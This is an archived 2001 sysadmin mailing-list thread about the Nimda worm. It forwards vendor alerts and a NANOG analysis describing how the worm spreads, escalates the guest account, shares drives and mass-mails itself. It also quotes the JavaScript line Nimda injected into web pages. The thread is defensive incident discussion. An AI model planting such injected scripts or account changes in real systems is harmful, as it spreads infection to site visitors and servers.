RE: FW: Worm probes

2001-09-18 Thread RZorz
Title: RE: FW: Worm probes





From Panda (note they won't have a sig file for a few hours yet):
Panda Software alerts users on the appearance of W32/Nimda.A@mm (alias Nimda), possibly originated in China, which spreads through the e-mail and is automatically executed simply by previewing the message that contains it. 

To perform the infection it exploits a vulnerability discovered by the security expert Juan Carlos García Cuartango in Internet Explorer 5 browser, as well as Outlook and Outlook Express mail clients. This flaw allows for the automatic and immediate execution of files. This means no action, such as double-clicking the attached file, is necessary for the virus to be activated. However, it requires that the 'preview' option is enabled in the mail clients for the vulnerability to be exploited and README.EXE, the virus filename, to be executed.

Due to this threat, Panda Software recommends to follow up the news appearing in the specialised media. It also warns against opening the mail client before the anti-virus is updated with the corresponding pav.sig, which will be made available to all users by the European multinational in the next few hours, together with the additional info about the virus.


-Original Message-
From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED]]
Sent: Tuesday, September 18, 2001 12:21 PM
To: NT System Admin Issues
Subject: Fw: FW: Worm probes



Here's one from a thread on nanog


HTH,


Geoff


- Original Message -
From: Jim Olsen [EMAIL PROTECTED]
To: [EMAIL PROTECTED]
Sent: Tuesday, September 18, 2001 11:03 AM
Subject: Re: FW: Worm probes




 This is the information i've collected thus far on W32.nimda:

 W32.nimda is NOT a code red variant, and the people who referring to it as
 Code Blue were mistaken...

 The name it has been given (at least by TruSecure) is W32.nimda.a.mm. It
uses
 several vulnerabilities in Windows NT and 2000 server's to infect a
server,
 and also employ's email and web site mobile code to infect Windows
 9x/ME/NT/2k boxes.

 During the initial infection of a server, the worm does the following:
 - download a file named admin.dll via tftp from the system that
is
 trying to infect the target
 - add the guest account to the local administrators group and
 activates the account
 - makes sure c$ is shared out
 - copies itself to c, d, and e drives
 - tries to mail itself to email addresses that it discovers on the
 server
 - creates a file named readme.exe, which is used in the mobile
code
 inserted on the web sites below
 - add this string to the web pages found on the server:
 htmlscript language=JavaScriptwindow.open(readme.eml, null,
 resizable=no,top=6000,left=6000)/script/html
 - scans for and infects other vulnerable IIS servers
 - goes through all shared directories and puts sample.nws,
 sample.eml, desktop.eml, desktop.nws in each directory. these are eml
 messages with copies of itself (readme.exe) autoloaded by the mobile html
 code mentioned above.
 - goes through all shared directories and puts riched20.dll in
each
 directory, which is a trogan dll version of W32.nimda that is meant to
 infect people running notepad/wordpad in that directory.
 - puts a trojan mmc.exe in the winnt directory that is a copy of
 itself in the above readme.exe format (win2000 only)

 If a user views a web site that is hosted on an infected server, the
 following happens:
 - upon viewing an infected page, the mobile code extracts to
 readme.exe and starts in windows media player (without user intervention)
 - the user's machine becomes infected with W32.nimda at this point
 and time
 - the worm starts scanning for other vulnerable IIS servers
 - the worm emails itself to everyone on the user's address book
 - goes through all shared directories and puts sample.nws,
 sample.eml, desktop.eml, desktop.nws in each directory. these are eml
 messages with copies of itself (readme.exe) autoloaded by the mobile html
 code mentioned above.
 - goes through all shared directories and puts riched20.dll in
each
 directory, which is a trogjan dll version of W32.nimda that is meant to
 infect people running notepad/wordpad in that directory.
 - puts a trojan mmc.exe in the winnt directory that is a copy of
 itself in the above readme.exe format (win2000 only)

 It us unknown to me what happens (at this point in time) if a user opens
an
 attachment that is sent from an infected site. It is possible that it
could
 automatically infect the user's computer using the same methods mentioned
 above.

 EVERYONE who uses internet explorer to browse the internet should probably
do
 one of two things to stop from being automatically infected by W32.nimda
(i
 have not tested whether or not turning off javascript fixes the problem):
 o) don't browse web pages until microsoft releases a patch
 o) turn OFF javascript

 EVERYONE who uses outlook/outlook express should, at the very least, not
open
 any attachments that they are not expecting. Turning off auto-preview

RE: FW: Worm probes

2001-09-18 Thread RZorz
Title: RE: FW: Worm probes



reg 
hack to not execute perhaps? 

  -Original Message-From: John Cesta - Lists 
  [mailto:[EMAIL PROTECTED]]Sent: Tuesday, September 18, 2001 12:57 
  PMTo: NT System Admin IssuesSubject: RE: FW: Worm 
  probes
  
  
-Original Message-From: 
[EMAIL PROTECTED] 
[mailto:[EMAIL PROTECTED]]Sent: Tuesday, September 18, 
2001 3:26 PMTo: NT System Admin IssuesSubject: RE: FW: 
Worm probes
From Panda (note they won't have a sig file for a few hours 
yet): Panda Software alerts users on the appearance 
of W32/Nimda.A@mm (alias Nimda), possibly originated in China, which spreads 
through the e-mail and is automatically executed simply by previewing the 
message that contains it. 
To perform the infection it exploits a vulnerability 
discovered by the security expert Juan Carlos García Cuartango in Internet 
Explorer 5 browser, as well as Outlook and Outlook Express mail clients. 
This flaw allows for the automatic and immediate execution of files. This 
means no action, such as double-clicking the attached file, is necessary for 
the virus to be activated. However, it requires that the 'preview' option is 
enabled in the mail clients for the vulnerability to be exploited and 
README.EXE, the virus filename, to be executed.

I am not so sure thatthis assessment is entirely 
correct. For example, in my situation, I have a PC with Outlook2000 
and preview mode enabled. What I get is that when I click on the email a 
dialog box opens and prompts whether or not Iwish to save the file to 
disk - the README.EXE file that is.I just click cancel and then delete the 
email. I do not contract the virus.

John 
Due to this threat, Panda Software recommends to follow up 
the news appearing in the specialised media. It also warns against opening 
the mail client before the anti-virus is updated with the corresponding 
pav.sig, which will be made available to all users by the European 
multinational in the next few hours, together with the additional info about 
the virus.
-Original Message- From: 
[EMAIL PROTECTED] [mailto:[EMAIL PROTECTED]] 
Sent: Tuesday, September 18, 2001 12:21 PM To: NT System Admin Issues Subject: Fw: FW: 
Worm probes 
Here's one from a thread on nanog 
HTH, 
Geoff 
- Original Message - From: 
"Jim Olsen" [EMAIL PROTECTED] To: 
[EMAIL PROTECTED] Sent: Tuesday, September 18, 
2001 11:03 AM Subject: Re: FW: Worm probes 

  This is the information 
i've collected thus far on W32.nimda:  
 W32.nimda is NOT a code red variant, and the people 
who referring to it as  "Code Blue" were 
mistaken...   The 
name it has been given (at least by TruSecure) is W32.nimda.a.mm. It 
uses  several vulnerabilities 
in Windows NT and 2000 server's to infect a server,  and also employ's email and web 
site mobile code to infect Windows  9x/ME/NT/2k 
boxes.   During the 
initial infection of a server, the worm does the following:  - download a 
file named "admin.dll" via tftp from the system that is  trying to infect the target 
 - add 
the guest account to the local administrators group and  activates the account  - makes sure c$ 
is shared out  - copies itself 
to c, d, and e drives  - tries to mail 
itself to email addresses that it discovers on the  server  - creates a file 
named readme.exe, which is used in the mobile code  inserted on the web sites 
below  - add this 
string to the web pages found on the server:  
htmlscript language="JavaScript"window.open("readme.eml", 
null,  
"resizable=no,top=6000,left=6000")/script/html 
 - 
scans for and infects other vulnerable IIS servers  - goes through 
all shared directories and puts sample.nws,  
sample.eml, desktop.eml, desktop.nws in each directory. these are eml 
 messages with copies of itself (readme.exe) autoloaded 
by the mobile html  code mentioned above. 
 - goes 
through all shared directories and puts riched20.dll in each  directory, which is a trogan dll 
version of W32.nimda that is meant to  infect 
people running notepad/wordpad in that directory.  - puts a trojan 
mmc.exe in the winnt directory that is a copy of  itself in the above "readme.exe" format (win2000 only) 
  If a user views a web 
site that is hosted on an infected server, the  
following happens:  - upon viewing 
an infected page, the mobile code extracts to  
readme.exe and starts in windows media player (without user 
intervention)  - the user's 
machine becomes infected with W32.nimda at this point  and time  - the worm 
starts scanning for other vulnerable IIS servers  - the worm 
emails itself to everyone on the us

RE: FW: Worm probes

2001-09-18 Thread RZorz
Title: RE: FW: Worm probes




Name: Nimda 
Alias: W32/Nimda 
Virus Categories: WORM (E-MAIL) 
Virus Families: W32 GROUP 
Repairable: Yes 
Date of Appearance: 09/18/2001 
Included in the "Wild List": No 
Activation Condition 
Basic Information: W32/Nimda is a worm that spreads by e-mail and exploits a 
vulnerability in Windows98 and Windows2000 that makes it possible to run 
Audio/X-wav files through Windows Explorer. To ensure its propagation, this worm 
sends out a message that includes an attachment with the following name: 
README.EXE. This file pretends to be an Audio/Xwav file coded in Base64 format. 
After being decoded, the executable file that contains the worm is 57344 bytes 
long. 
One of the actions carried out by this worm consists of sharing the drive C: 
of the affected computer in order to spread to other network drives.

Means of Propagation This worm uses e-mail to spread to other systems. To do 
this it sends out messages containing an attachment with the following name: 
README.EXE. 

Symptoms of Infection This worm creates several files in the Windows 
temporary directory. Although the content of these files is basically very 
similar to the original file, it does present certain variations. Additionally, 
it creates a file called Wininit.ini in the Windows directory.
The worm is coded to download a file called Admin.dll. To do this it uses an 
application called Tftp.exe. Finally, the worm creates a new user through which 
it shares the C drive and attempts to spread to other network drives. 
Additionally, it exploits a vulnerability in Windows98 and Windows2000 that 
makes it possible to run Audio/X-wav files through Windows 
Explorer.

  -Original Message-From: Ray Zorz Sent: 
  Tuesday, September 18, 2001 12:58 PMTo: NT System Admin 
  IssuesSubject: RE: FW: Worm probes
  reg 
  hack to not execute perhaps? 
  
-Original Message-From: John Cesta - Lists 
[mailto:[EMAIL PROTECTED]]Sent: Tuesday, September 18, 2001 12:57 
PMTo: NT System Admin IssuesSubject: RE: FW: Worm 
probes


  -Original Message-From: 
  [EMAIL PROTECTED] 
  [mailto:[EMAIL PROTECTED]]Sent: Tuesday, September 
  18, 2001 3:26 PMTo: NT System Admin IssuesSubject: 
      RE: FW: Worm probes
  From Panda (note they won't have a sig file for a few 
  hours yet): Panda Software alerts users on the 
  appearance of W32/Nimda.A@mm (alias Nimda), possibly originated in China, 
  which spreads through the e-mail and is automatically executed simply by 
  previewing the message that contains it. 
  To perform the infection it exploits a vulnerability 
  discovered by the security expert Juan Carlos García Cuartango in Internet 
  Explorer 5 browser, as well as Outlook and Outlook Express mail clients. 
  This flaw allows for the automatic and immediate execution of files. This 
  means no action, such as double-clicking the attached file, is necessary 
  for the virus to be activated. However, it requires that the 'preview' 
  option is enabled in the mail clients for the vulnerability to be 
  exploited and README.EXE, the virus filename, to be executed.
  
  I am not so sure thatthis assessment is entirely 
  correct. For example, in my situation, I have a PC with Outlook2000 
  and preview mode enabled. What I get is that when I click on the email a 
  dialog box opens and prompts whether or not Iwish to save the file 
  to disk - the README.EXE file that is.I just click cancel and then delete 
  the email. I do not contract the virus.
  
  John 
  Due to this threat, Panda Software recommends to follow up 
  the news appearing in the specialised media. It also warns against opening 
  the mail client before the anti-virus is updated with the corresponding 
  pav.sig, which will be made available to all users by the European 
  multinational in the next few hours, together with the additional info 
  about the virus.
  -Original Message- From: 
  [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED]] 
  Sent: Tuesday, September 18, 2001 12:21 PM 
  To: NT System Admin Issues Subject: Fw: FW: Worm probes 
  Here's one from a thread on nanog 
  HTH, 
  Geoff 
  - Original Message - From: 
  "Jim Olsen" [EMAIL PROTECTED] To: 
  [EMAIL PROTECTED] Sent: Tuesday, September 
  18, 2001 11:03 AM Subject: Re: FW: Worm 
  probes 
This is the information 
  i've collected thus far on W32.nimda:  
   W32.nimda is NOT a code red variant, and the people 
  who referring to it as  "Code Blue" were 
  mistaken...   The 
  name it has been given (at least by TruSecure) is W32.nimda.a.mm. 
  It uses  several 
  vulnerabilities in Windows NT and 2000 server's to infect a 
  server,  and also employ's 
  email and web site mobile code 

RE: FW: Worm probes

2001-09-18 Thread John Cesta - Lists
Title: RE: FW: Worm probes





  -Original Message-From: [EMAIL PROTECTED] 
  [mailto:[EMAIL PROTECTED]]Sent: Tuesday, September 18, 
  2001 3:26 PMTo: NT System Admin IssuesSubject: RE: FW: 
  Worm probes
  From Panda (note they won't have a sig file for a few hours 
  yet): Panda Software alerts users on the appearance of 
  W32/Nimda.A@mm (alias Nimda), possibly originated in China, which spreads 
  through the e-mail and is automatically executed simply by previewing the 
  message that contains it. 
  To perform the infection it exploits a vulnerability 
  discovered by the security expert Juan Carlos García Cuartango in Internet 
  Explorer 5 browser, as well as Outlook and Outlook Express mail clients. This 
  flaw allows for the automatic and immediate execution of files. This means no 
  action, such as double-clicking the attached file, is necessary for the virus 
  to be activated. However, it requires that the 'preview' option is enabled in 
  the mail clients for the vulnerability to be exploited and README.EXE, the 
  virus filename, to be executed.
  
  I am not so sure thatthis assessment is entirely correct. 
  For example, in my situation, I have a PC with Outlook2000 and preview 
  mode enabled. What I get is that when I click on the email a dialog box opens 
  and prompts whether or not Iwish to save the file to disk - the 
  README.EXE file that is.I just click cancel and then delete the email. I do 
  not contract the virus.
  
  John 
  Due to this threat, Panda Software recommends to follow up the 
  news appearing in the specialised media. It also warns against opening the 
  mail client before the anti-virus is updated with the corresponding pav.sig, 
  which will be made available to all users by the European multinational in the 
  next few hours, together with the additional info about the 
  virus.
  -Original Message- From: 
  [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED]] 
  Sent: Tuesday, September 18, 2001 12:21 PM To: NT System Admin Issues Subject: Fw: FW: 
  Worm probes 
  Here's one from a thread on nanog 
  HTH, 
  Geoff 
  - Original Message - From: 
  "Jim Olsen" [EMAIL PROTECTED] To: 
  [EMAIL PROTECTED] Sent: Tuesday, September 18, 
  2001 11:03 AM Subject: Re: FW: Worm probes 
  
This is the information i've 
  collected thus far on W32.nimda:   W32.nimda is NOT a code red variant, and the people who referring 
  to it as  "Code Blue" were mistaken... 
The name it has been given 
  (at least by TruSecure) is W32.nimda.a.mm. It uses  several vulnerabilities in Windows NT 
  and 2000 server's to infect a server,  and also employ's email and web site mobile code to infect 
  Windows  9x/ME/NT/2k boxes.   During the initial infection of a 
  server, the worm does the following:  - download a file 
  named "admin.dll" via tftp from the system that is  trying to infect the target 
   - add 
  the guest account to the local administrators group and  activates the account  - makes sure c$ is 
  shared out  - copies itself to 
  c, d, and e drives  - tries to mail 
  itself to email addresses that it discovers on the  server  - creates a file 
  named readme.exe, which is used in the mobile code  inserted on the web sites 
  below  - add this string 
  to the web pages found on the server:  
  htmlscript language="JavaScript"window.open("readme.eml", 
  null,  
  "resizable=no,top=6000,left=6000")/script/html 
   - scans 
  for and infects other vulnerable IIS servers  - goes through all 
  shared directories and puts sample.nws,  
  sample.eml, desktop.eml, desktop.nws in each directory. these are eml 
   messages with copies of itself (readme.exe) autoloaded 
  by the mobile html  code mentioned above. 
   - goes 
  through all shared directories and puts riched20.dll in each  directory, which is a trogan dll 
  version of W32.nimda that is meant to  infect 
  people running notepad/wordpad in that directory.  - puts a trojan 
  mmc.exe in the winnt directory that is a copy of  
  itself in the above "readme.exe" format (win2000 only)   If a user views a web site that is 
  hosted on an infected server, the  following 
  happens:  - upon viewing an 
  infected page, the mobile code extracts to  
  readme.exe and starts in windows media player (without user 
  intervention)  - the user's 
  machine becomes infected with W32.nimda at this point  and time  - the worm starts 
  scanning for other vulnerable IIS servers  - the worm emails 
  itself to everyone on the user's address book  - goes through all 
  shared directories and puts sample.nws,  
  sample.eml, desktop.eml, desktop.nws in each directory. these are eml 
   messages with copies of itself (readme.exe) autoloaded 
  by the mobile html  code mentioned above. 
   - goes 
  through all shared directories and puts riched20.dll in each  directory, which is a trogjan dll 
  version of W32.nimda that is meant t